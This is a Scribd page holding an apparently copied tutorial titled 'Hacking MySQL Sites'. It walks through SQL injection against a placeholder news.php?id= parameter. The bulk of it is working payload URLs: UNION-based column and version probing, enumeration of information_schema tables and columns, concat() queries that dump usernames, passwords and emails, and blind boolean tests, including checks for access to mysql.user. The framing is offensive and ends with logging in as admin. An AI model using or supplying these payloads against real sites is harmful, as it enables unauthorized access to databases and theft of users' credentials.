Scribd
Upload
14 views5 pages

HACKING MY-SQL SITES - SQL Injection Attacks and Tutorials by Exploit DB

The document discusses techniques for SQL injection, specifically focusing on using the UNION function to extract data from a database, including MySQL version detection and retrieving table and column names. It explains methods for both MySQL versions less than and greater than 5, as well as blind SQL injection techniques to infer data without error messages. The document provides example queries to demonstrate how to exploit vulnerabilities in a website's database security.

Uploaded by

akashy0944
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
14 views5 pages

HACKING MY-SQL SITES - SQL Injection Attacks and Tutorials by Exploit DB

The document discusses techniques for SQL injection, specifically focusing on using the UNION function to extract data from a database, including MySQL version detection and retrieving table and column names. It explains methods for both MySQL versions less than and greater than 5, as well as blind SQL injection techniques to infer data without error messages. The document provides example queries to demonstrate how to exploit vulnerabilities in a website's database security.

Uploaded by

akashy0944
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

CHECKING FOR UNION FUNCTION

Our next is step is to check for union function. This is because with union
function we can select more data in one statement only. Like:

http://www.site.com/news.php?id=7 union all select 1,2,3/* (we already


found that number of columns are 3)

If we see some numbers on screen, i.e. 1 or 2 or 3, that means the UNION


works

CHECKING FOR MySQL VERSION

Lets us check for the MySQL version. Lets us assume that on checking for
union function, we got number 3 on the screen. So for detecting the version,
we will replace number 3 of our query by @@version or version(). Like:

http://www.site.com/news.php?id=7 union all select 1,2,@@version/*

if you get an error union + illegal mix of collations (IMPLICIT +


COERCIBLE), we need a convert() function. Like with hex() or unhex():

http://www.site.com/news.php?id=5 union all select


1,2,unhex(hex(@@version))/*

GETTING TABLE AND COLUMN NAME

This is for MySQL version < 5. Later in this paper I’ll be discussing it for
version > 5.

common table names are: user/s, admin/s, member/s

common column names are: username, user, usr, user_name, password, pass,
passwd, pwd etc

So our query will be like this:

http://www.site.com/news.php?id=7 union all select 1,2,3 from admin/*


We see number 3 on the screen like before. Now we know that table admin
exists. Now to check column names we craft a query:

http://www.site.com/news.php?id=7 union all select 1,2,username from


admin/* (if you get an error, then try the other column name)

We get username displayed on screen; example would be admin, or


superadmin etc

Now to check for the column password, we craft this query:

http://www.site.com/news.php?id=7 union all select 1,2,password from


admin/* (if you get an error, then try the other column name)

If we got successful, we will see password on the screen. It can be in plain


text or hash depending on how the database has been setup ☺. Now we must
complete the query. For that we can use concat() function (it joins strings):

http://www.site.com/news.php?id=7 union all select


1,2,concat(username,0x3a,password)from admin/*

Note that we put 0x3a, its hex value for : (so 0x3a is hex value for colon)

Now we get displayed username: password on screen, i.e. admin: admin or


admin: some hash, we can log into the site as admin ☺

FOR MySQL > 5

In this case, we will need information_schema. It holds all the tables and
columns in the database. So to get it, we use table_name and
information_schema. Like:

http://www.site.com/news.php?id=5 union all select 1,2,table_name from


information_schema.tables/*

Here we replace the our number 2 with table_name to get the first table from
information_schema.tables displayed on the screen. Now we must add
LIMIT to the end of query to list out all tables. Like:
http://www.site.com/news.php?id=7 union all select 1,2,table_name from
information_schema.tables limit 0,1/*

Note that I put 1, 0 i.e. getting result 1 form 0

Now to view the second table, we change limit 0, 1 to limit 1, 1:

http://www.site.com/news.php?id=7 union all select 1,2,table_name from


information_schema.tables limit 1,1/*

The second table is displayed.

For third table we put limit 2,1

http://www.site.com/news.php?id=7 union all select 1,2,table_name from


information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth,
auth_user etc ☺

To get the column names the method is the same. Here we use
column_name and information_schema.columns. Like:

http://www.site.com/news.php?id=5 union all select 1,2,column_name from


information_schema.columns limit 0,1/*

The first column name is displayed. For second column we will change the
limit for 0,1 to 1,0 and so on.

If you want to display column names for specific table use where clause

Let us assume that we have found a table “user”. Like:

http://www.site.com/news.php?id=7 union all select 1,2,column_name from


information_schema.columns where table_name='users'/*

Now we get displayed column name in table users. Just using LIMIT we can
list all columns in table users.

Note that this won't work if the magic quotes is ON.


Let’s say that we found columns user, pass and email. Now to complete
query to put them all together using concat():

http://www.site.com/news.php?id=7 union all select 1,2


concat(user,0x3a,pass,0x3a,email) from users/*

What we get here is user:pass:email from table users.

Example: admin:hash:[email protected]

BLIND SQL INJECTION

The above we discussed comes under Error based sql injection. Let us the
discuss the harder part i.e. Blind sql injection.

We use our example: http://www.site.com/news.php?id=7

Let’s test it:

http://www.site.com/news.php?id=7 and 1=1 <--- this is always true and the


page loads normally, that's ok.

http://www.site.com/news.php?id=7 and 1=2 <--- this is false, so if some


text, picture or some content is missing on returned page then that site is
vulnerable to blind sql injection. ☺

GETTING MySQL VERSION

To get the MySQL version in blind attack we use substring:

http://www.site.com/news.php?id=7 and substring(@@version,1,1)=4

This should return TRUE if the version of MySQL is 4. Replace 4 with 5,


and if query return TRUE then the version is 5.
CHECKING FOR SUBSELECT

When select don't work then we use subselect:

http://www.site.com/news.php?id=7 and (select 1)=1

If page loads normally then subselect work, then we are going to see if we
have access to mysql.user:

http://www.site.com/news.php?id=7 and (select 1 from mysql.user limit


0,1)=1

If page loads normally we have access to mysql.user and then later we can
pull some password using load_file() function and OUTFILE.

CHECKING FOR TABLE AND COLUMN NAME

Here luck and guessing works more than anything ☺

http://www.site.com/news.php?id=7 and (select 1 from users limit 0,1)=1

(with limit 0,1 our query here returns 1 row of data, cause subselect returns
only 1 row, this is very important.)

Then if the page loads normally without content missing, the table users
exits. If you get FALSE (some article missing), just change table name until
you guess the right one.

Let’s say that we have found that table name is users, now what we need is
column name. The same as table name, we start guessing. Like i said before
try the common names for columns:

http://www.site.com/news.php?id=5 and (select


substring(concat(1,password),1,1) from users limit 0,1)=1

If the page loads normally we know that column name is password (if we get
false then try common names or just guess). Here we merge 1 with the
column password, then substring returns the first character (1,1)

You might also like